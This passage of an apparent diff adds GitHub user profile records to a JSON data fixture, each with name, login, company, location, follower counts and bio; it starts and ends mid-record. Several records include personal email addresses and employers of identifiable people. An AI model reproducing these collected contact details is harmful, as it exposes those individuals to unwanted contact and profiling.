0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-04-08T11:53:42Z", + "updated_at": "2024-06-30T19:09:14Z", + "node_id": "MDQ6VXNlcjYzMzUwMTg0", + "bio": "Professional software developer, Kotlin, Python, C#", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1807, + "fields": { + "nest_created_at": "2024-09-12T00:27:21.807Z", + "nest_updated_at": "2024-09-22T19:29:22.964Z", + "name": "James Howe", + "login": "OrangeDog", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/675056?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 14, + "public_gists_count": 7, + "public_repositories_count": 55, + "created_at": "2011-03-17T12:39:19Z", + "updated_at": "2024-09-02T09:09:20Z", + "node_id": "MDQ6VXNlcjY3NTA1Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1808, + "fields": { + "nest_created_at": "2024-09-12T00:27:24.668Z", + "nest_updated_at": "2024-09-12T00:27:24.668Z", + "name": "Richard Fussenegger", + "login": "Fleshgrinder", + "email": "github@fleshgrinder.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1059453?v=4", + "company": "@personio", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 107, + "public_gists_count": 25, + "public_repositories_count": 79, + "created_at": "2011-09-18T07:30:12Z", + "updated_at": "2024-09-08T06:50:22Z", + "node_id": "MDQ6VXNlcjEwNTk0NTM=", + "bio": "Passionate hands-on software engineer who enjoys programming and solving problems. 👾", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1809, + "fields": { + "nest_created_at": "2024-09-12T00:27:25.889Z", + "nest_updated_at": "2024-09-12T00:27:25.890Z", + "name": "Peter", + "login": "peterfigure", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/62901374?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2020-03-30T17:15:09Z", + "updated_at": "2022-05-04T21:51:05Z", + "node_id": "MDQ6VXNlcjYyOTAxMzc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1810, + "fields": { + "nest_created_at": "2024-09-12T00:27:28.358Z", + "nest_updated_at": "2024-09-12T00:27:28.358Z", + "name": "", + "login": "pandischen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10131362?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2014-12-09T15:28:45Z", + "updated_at": "2023-12-12T02:33:06Z", + "node_id": "MDQ6VXNlcjEwMTMxMzYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1811, + "fields": { + "nest_created_at": "2024-09-12T00:27:29.577Z", + "nest_updated_at": "2024-09-12T00:29:31.393Z", + "name": "Eric Ballet Baz", + "login": "eballetbaz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22594539?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-10-03T14:25:05Z", + "updated_at": "2024-07-03T12:40:27Z", + "node_id": "MDQ6VXNlcjIyNTk0NTM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1812, + "fields": { + "nest_created_at": "2024-09-12T00:27:30.408Z", + "nest_updated_at": "2024-09-12T00:27:30.408Z", + "name": "Juha", + "login": "JuhaO81", + "email": "juhao81@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29195184?v=4", + "company": "Nordea", + "location": "Oulu", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-06-05T08:47:31Z", + "updated_at": "2024-05-20T07:41:47Z", + "node_id": "MDQ6VXNlcjI5MTk1MTg0", + "bio": "iOS lead developer for Nordea mobile apps", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1813, + "fields": { + "nest_created_at": "2024-09-12T00:27:31.636Z", + "nest_updated_at": "2024-09-12T00:27:31.636Z", + "name": "Andrey Yegorov", + "login": "dlg99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8622884?v=4", + "company": "Datastax", + "location": "Sammamish, WA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2014-09-02T04:09:15Z", + "updated_at": "2024-08-16T20:35:04Z", + "node_id": "MDQ6VXNlcjg2MjI4ODQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1814, + "fields": { + "nest_created_at": "2024-09-12T00:27:32.826Z", + "nest_updated_at": "2024-09-12T00:27:32.826Z", + "name": "chetan jadhav", + "login": "chetan-2085", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67169320?v=4", + "company": "", + "location": "WA, USA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2020-06-19T20:19:21Z", + "updated_at": "2023-07-20T17:49:02Z", + "node_id": "MDQ6VXNlcjY3MTY5MzIw", + "bio": "Application Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1815, + "fields": { + "nest_created_at": "2024-09-12T00:27:33.637Z", + "nest_updated_at": "2024-09-12T00:27:33.637Z", + "name": "", + "login": "crypticraven", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33463678?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-11-07T18:27:45Z", + "updated_at": "2024-05-22T15:48:56Z", + "node_id": "MDQ6VXNlcjMzNDYzNjc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1816, + "fields": { + "nest_created_at": "2024-09-12T00:27:34.918Z", + "nest_updated_at": "2024-09-12T00:27:43.129Z", + "name": "Lars", + "login": "Lars5678", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57911568?v=4", + "company": "Hermes Einrichtungs Service", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-11-18T16:26:53Z", + "updated_at": "2024-08-16T12:04:06Z", + "node_id": "MDQ6VXNlcjU3OTExNTY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1817, + "fields": { + "nest_created_at": "2024-09-12T00:27:36.135Z", + "nest_updated_at": "2024-09-12T00:27:36.135Z", + "name": "", + "login": "almacore", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76726755?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-12-29T08:06:22Z", + "updated_at": "2022-02-03T11:54:42Z", + "node_id": "MDQ6VXNlcjc2NzI2NzU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1818, + "fields": { + "nest_created_at": "2024-09-12T00:27:36.944Z", + "nest_updated_at": "2024-09-12T00:27:36.944Z", + "name": "", + "login": "pcoder47", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45415992?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-11-28T06:33:49Z", + "updated_at": "2024-06-20T10:32:56Z", + "node_id": "MDQ6VXNlcjQ1NDE1OTky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1819, + "fields": { + "nest_created_at": "2024-09-12T00:27:38.208Z", + "nest_updated_at": "2024-09-12T00:27:38.208Z", + "name": "Aaron Forster", + "login": "omadawn", + "email": "github@forstersfreehold.com", + "avatar_url": "https://avatars.githubusercontent.com/u/603925?v=4", + "company": "", + "location": "Washington", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2011-02-07T01:02:57Z", + "updated_at": "2024-06-25T20:51:36Z", + "node_id": "MDQ6VXNlcjYwMzkyNQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1820, + "fields": { + "nest_created_at": "2024-09-12T00:27:40.659Z", + "nest_updated_at": "2024-09-12T00:27:40.659Z", + "name": "Marvin Brouwer", + "login": "Marvin-Brouwer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5499778?v=4", + "company": "", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2013-09-20T07:06:52Z", + "updated_at": "2024-09-06T12:52:35Z", + "node_id": "MDQ6VXNlcjU0OTk3Nzg=", + "bio": "Moved some projects to Gitlab a while ago, if you're missing repositories on my profile here go check me out on gitlab.\r\nComing back to Github though", + "is_hireable": false, + "twitter_username": "MarvinBrouwer" + } +}, +{ + "model": "github.user", + "pk": 1821, + "fields": { + "nest_created_at": "2024-09-12T00:27:44.440Z", + "nest_updated_at": "2024-09-12T00:27:44.440Z", + "name": "", + "login": "dr0ndv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14971280?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-10-05T04:12:02Z", + "updated_at": "2022-11-02T13:54:07Z", + "node_id": "MDQ6VXNlcjE0OTcxMjgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1822, + "fields": { + "nest_created_at": "2024-09-12T00:27:48.169Z", + "nest_updated_at": "2024-09-12T00:27:48.169Z", + "name": "Mariusz Sondecki", + "login": "sondemar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7047919?v=4", + "company": "Auto1", + "location": "Stettin", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 70, + "created_at": "2014-03-24T14:16:42Z", + "updated_at": "2023-11-03T05:35:46Z", + "node_id": "MDQ6VXNlcjcwNDc5MTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1823, + "fields": { + "nest_created_at": "2024-09-12T00:27:50.606Z", + "nest_updated_at": "2024-09-22T19:28:16.630Z", + "name": "Armin Schrenk", + "login": "infeo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9036915?v=4", + "company": "@cryptomator @skymatic", + "location": "Germany", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 37, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2014-10-06T14:01:15Z", + "updated_at": "2024-08-13T08:43:28Z", + "node_id": "MDQ6VXNlcjkwMzY5MTU=", + "bio": "Employee of @skymatic .\r\nPassionate Java-Fan", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1824, + "fields": { + "nest_created_at": "2024-09-12T00:27:51.865Z", + "nest_updated_at": "2024-09-12T00:27:51.865Z", + "name": "Rong Dang", + "login": "DRong1121", + "email": "rongdang1121@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20332907?v=4", + "company": "", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-07-07T06:07:46Z", + "updated_at": "2024-07-10T09:48:43Z", + "node_id": "MDQ6VXNlcjIwMzMyOTA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1825, + "fields": { + "nest_created_at": "2024-09-12T00:27:52.272Z", + "nest_updated_at": "2024-09-12T00:27:52.272Z", + "name": "Mehmet Tahir Dede", + "login": "JustMehmet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/105645217?v=4", + "company": "HMCTS", + "location": "Maidenhead, UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-05-16T11:46:53Z", + "updated_at": "2024-08-29T14:01:37Z", + "node_id": "U_kgDOBkwEoQ", + "bio": "Senior Developer", + "is_hireable": false, + "twitter_username": "tdmehmet" + } +}, +{ + "model": "github.user", + "pk": 1826, + "fields": { + "nest_created_at": "2024-09-12T00:27:53.518Z", + "nest_updated_at": "2024-09-12T00:27:53.518Z", + "name": "", + "login": "ryandutton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72393782?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2020-10-05T12:58:47Z", + "updated_at": "2024-08-01T09:51:24Z", + "node_id": "MDQ6VXNlcjcyMzkzNzgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1827, + "fields": { + "nest_created_at": "2024-09-12T00:27:54.726Z", + "nest_updated_at": "2024-09-12T00:27:54.726Z", + "name": "Matthew Condell", + "login": "mcondellva", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87145733?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-07-08T17:53:45Z", + "updated_at": "2024-06-11T13:37:37Z", + "node_id": "MDQ6VXNlcjg3MTQ1NzMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1828, + "fields": { + "nest_created_at": "2024-09-12T00:27:56.341Z", + "nest_updated_at": "2024-09-12T00:27:56.341Z", + "name": "Olivier Lefebvre", + "login": "aguacongas", + "email": "aguacongas@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3294829?v=4", + "company": "Aguafrommars, SIEN", + "location": "Neuchâtel, Switzerland", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 37, + "public_gists_count": 4, + "public_repositories_count": 23, + "created_at": "2013-01-17T09:54:41Z", + "updated_at": "2024-08-22T11:28:50Z", + "node_id": "MDQ6VXNlcjMyOTQ4Mjk=", + "bio": "I'm good at developing software with C#, TypeScript and Javascript. \r\nI'm good at integrating tools in a CI/CD chain. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1829, + "fields": { + "nest_created_at": "2024-09-12T00:27:57.572Z", + "nest_updated_at": "2024-09-12T00:27:57.572Z", + "name": "Martin Tomašovič", + "login": "McMlok", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15009530?v=4", + "company": "KB", + "location": "Prague", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 17, + "created_at": "2015-10-07T06:09:17Z", + "updated_at": "2024-07-12T13:08:35Z", + "node_id": "MDQ6VXNlcjE1MDA5NTMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1830, + "fields": { + "nest_created_at": "2024-09-12T00:27:58.781Z", + "nest_updated_at": "2024-09-12T00:27:58.781Z", + "name": "", + "login": "jpcmonster", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51028652?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-05-25T16:21:48Z", + "updated_at": "2024-02-14T14:11:41Z", + "node_id": "MDQ6VXNlcjUxMDI4NjUy", + "bio": "just someone somewhere in Canada. :P", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1831, + "fields": { + "nest_created_at": "2024-09-12T00:27:59.608Z", + "nest_updated_at": "2024-09-12T00:27:59.608Z", + "name": "Narayana R", + "login": "rnarayana", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/203111?v=4", + "company": "Optym", + "location": "Bangalore", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 7, + "public_gists_count": 9, + "public_repositories_count": 9, + "created_at": "2010-02-13T17:12:41Z", + "updated_at": "2024-09-06T14:59:25Z", + "node_id": "MDQ6VXNlcjIwMzExMQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "rnarayana" + } +}, +{ + "model": "github.user", + "pk": 1832, + "fields": { + "nest_created_at": "2024-09-12T00:28:00.856Z", + "nest_updated_at": "2024-09-12T00:28:00.856Z", + "name": "", + "login": "31deR", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60350660?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-01-27T13:45:13Z", + "updated_at": "2023-09-07T13:02:24Z", + "node_id": "MDQ6VXNlcjYwMzUwNjYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1833, + "fields": { + "nest_created_at": "2024-09-12T00:28:02.047Z", + "nest_updated_at": "2024-09-12T00:28:02.047Z", + "name": "", + "login": "profTwinglings", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25454662?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 3, + "public_repositories_count": 1, + "created_at": "2017-01-31T10:48:24Z", + "updated_at": "2023-12-14T08:46:09Z", + "node_id": "MDQ6VXNlcjI1NDU0NjYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1834, + "fields": { + "nest_created_at": "2024-09-12T00:28:03.674Z", + "nest_updated_at": "2024-09-12T00:28:03.674Z", + "name": "Remus Dugheanu", + "login": "robingood", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1123371?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2011-10-12T18:52:06Z", + "updated_at": "2024-03-01T10:02:38Z", + "node_id": "MDQ6VXNlcjExMjMzNzE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1835, + "fields": { + "nest_created_at": "2024-09-12T00:28:04.884Z", + "nest_updated_at": "2024-09-12T00:28:04.884Z", + "name": "Bernhard Haumacher", + "login": "haumacher", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5607145?v=4", + "company": "@top-logic ", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 18, + "public_gists_count": 2, + "public_repositories_count": 63, + "created_at": "2013-10-03T22:11:00Z", + "updated_at": "2024-02-18T07:01:48Z", + "node_id": "MDQ6VXNlcjU2MDcxNDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1836, + "fields": { + "nest_created_at": "2024-09-12T00:28:07.384Z", + "nest_updated_at": "2024-09-12T00:28:07.384Z", + "name": "", + "login": "octavioricci", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13836158?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2015-08-17T15:47:43Z", + "updated_at": "2024-09-05T00:12:13Z", + "node_id": "MDQ6VXNlcjEzODM2MTU4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1837, + "fields": { + "nest_created_at": "2024-09-12T00:28:08.643Z", + "nest_updated_at": "2024-09-12T00:28:08.643Z", + "name": "", + "login": "SkippedTurn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33953480?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-11-24T09:10:51Z", + "updated_at": "2022-12-01T14:23:35Z", + "node_id": "MDQ6VXNlcjMzOTUzNDgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1838, + "fields": { + "nest_created_at": "2024-09-12T00:28:10.244Z", + "nest_updated_at": "2024-09-12T00:28:10.244Z", + "name": "", + "login": "JosselinDuhamel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49819620?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-04-20T18:36:22Z", + "updated_at": "2022-05-24T13:42:00Z", + "node_id": "MDQ6VXNlcjQ5ODE5NjIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1839, + "fields": { + "nest_created_at": "2024-09-12T00:28:12.811Z", + "nest_updated_at": "2024-09-12T00:28:12.811Z", + "name": "Paul Wagland", + "login": "pwagland", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/748033?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2011-04-23T21:44:13Z", + "updated_at": "2024-05-17T16:57:46Z", + "node_id": "MDQ6VXNlcjc0ODAzMw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1840, + "fields": { + "nest_created_at": "2024-09-12T00:28:14.019Z", + "nest_updated_at": "2024-09-12T00:30:49.968Z", + "name": "Dmitriy Popov", + "login": "dmitry-weirdo", + "email": "dmitry.weirdo@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15837869?v=4", + "company": "https://www.vorwerk.com/", + "location": "Düsseldorf", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2015-11-13T18:57:20Z", + "updated_at": "2024-08-08T10:13:53Z", + "node_id": "MDQ6VXNlcjE1ODM3ODY5", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1841, + "fields": { + "nest_created_at": "2024-09-12T00:28:15.221Z", + "nest_updated_at": "2024-09-12T00:28:40.802Z", + "name": "Carmelo Scollo", + "login": "melo0187", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2528018?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 6, + "public_gists_count": 9, + "public_repositories_count": 26, + "created_at": "2012-10-10T12:08:55Z", + "updated_at": "2024-05-21T07:10:18Z", + "node_id": "MDQ6VXNlcjI1MjgwMTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1842, + "fields": { + "nest_created_at": "2024-09-12T00:28:17.245Z", + "nest_updated_at": "2024-09-12T00:28:17.245Z", + "name": "", + "login": "itsecforu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38696837?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-04-24T14:56:48Z", + "updated_at": "2024-02-07T08:08:13Z", + "node_id": "MDQ6VXNlcjM4Njk2ODM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1843, + "fields": { + "nest_created_at": "2024-09-12T00:28:20.139Z", + "nest_updated_at": "2024-09-12T00:28:20.139Z", + "name": "Torsten Kruse", + "login": "TorstenKruse", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3072311?v=4", + "company": "@COMINTO", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2012-12-18T13:12:13Z", + "updated_at": "2023-06-28T13:47:24Z", + "node_id": "MDQ6VXNlcjMwNzIzMTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1844, + "fields": { + "nest_created_at": "2024-09-12T00:28:21.818Z", + "nest_updated_at": "2024-09-12T00:28:21.818Z", + "name": "Marc Schmid", + "login": "m4rc77", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19596774?v=4", + "company": "@puzzle", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2016-05-26T18:54:53Z", + "updated_at": "2024-08-16T13:26:49Z", + "node_id": "MDQ6VXNlcjE5NTk2Nzc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1845, + "fields": { + "nest_created_at": "2024-09-12T00:28:23.819Z", + "nest_updated_at": "2024-09-12T00:28:23.819Z", + "name": "", + "login": "Si-So", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72555364?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-10-08T11:46:44Z", + "updated_at": "2024-03-15T14:06:23Z", + "node_id": "MDQ6VXNlcjcyNTU1MzY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1846, + "fields": { + "nest_created_at": "2024-09-12T00:28:25.029Z", + "nest_updated_at": "2024-09-12T00:28:25.029Z", + "name": "亂馬客", + "login": "rainmakerho", + "email": "rainmaker_ho@msn.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11240907?v=4", + "company": "www.gss.com.tw", + "location": "taiwan", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 44, + "public_gists_count": 8, + "public_repositories_count": 156, + "created_at": "2015-02-28T05:57:12Z", + "updated_at": "2024-07-08T07:12:07Z", + "node_id": "MDQ6VXNlcjExMjQwOTA3", + "bio": "rainmaker_ho@gss.com.tw\r\n\r\nhttps://rainmakerho.github.io/\r\nhttps://dotblogs.com.tw/rainmaker/\r\n\r\nhttps://www.slideshare.net/rainmakerho", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1847, + "fields": { + "nest_created_at": "2024-09-12T00:28:26.251Z", + "nest_updated_at": "2024-09-22T16:42:11.376Z", + "name": "", + "login": "pajinator", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110091141?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-07-27T08:01:34Z", + "updated_at": "2023-05-05T10:23:23Z", + "node_id": "U_kgDOBo_bhQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1848, + "fields": { + "nest_created_at": "2024-09-12T00:28:27.469Z", + "nest_updated_at": "2024-09-12T00:28:27.469Z", + "name": "", + "login": "wenjunattech", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/103624854?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-04-14T05:42:33Z", + "updated_at": "2023-01-19T00:51:23Z", + "node_id": "U_kgDOBi0wlg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1849, + "fields": { + "nest_created_at": "2024-09-12T00:28:28.680Z", + "nest_updated_at": "2024-09-12T00:28:28.680Z", + "name": "", + "login": "y25zhao", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/613827?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2011-02-12T02:24:41Z", + "updated_at": "2023-01-19T04:37:54Z", + "node_id": "MDQ6VXNlcjYxMzgyNw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1850, + "fields": { + "nest_created_at": "2024-09-12T00:28:30.347Z", + "nest_updated_at": "2024-09-12T00:28:30.347Z", + "name": "Craig Muchinsky", + "login": "cmuchinsky", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23175991?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-10-31T19:01:59Z", + "updated_at": "2024-08-28T11:46:22Z", + "node_id": "MDQ6VXNlcjIzMTc1OTkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1851, + "fields": { + "nest_created_at": "2024-09-12T00:28:32.337Z", + "nest_updated_at": "2024-09-22T19:28:53.236Z", + "name": "Volkert", + "login": "volkert-fastned", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47151527?v=4", + "company": "@Fastned ", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-01-29T16:01:35Z", + "updated_at": "2024-04-24T15:24:35Z", + "node_id": 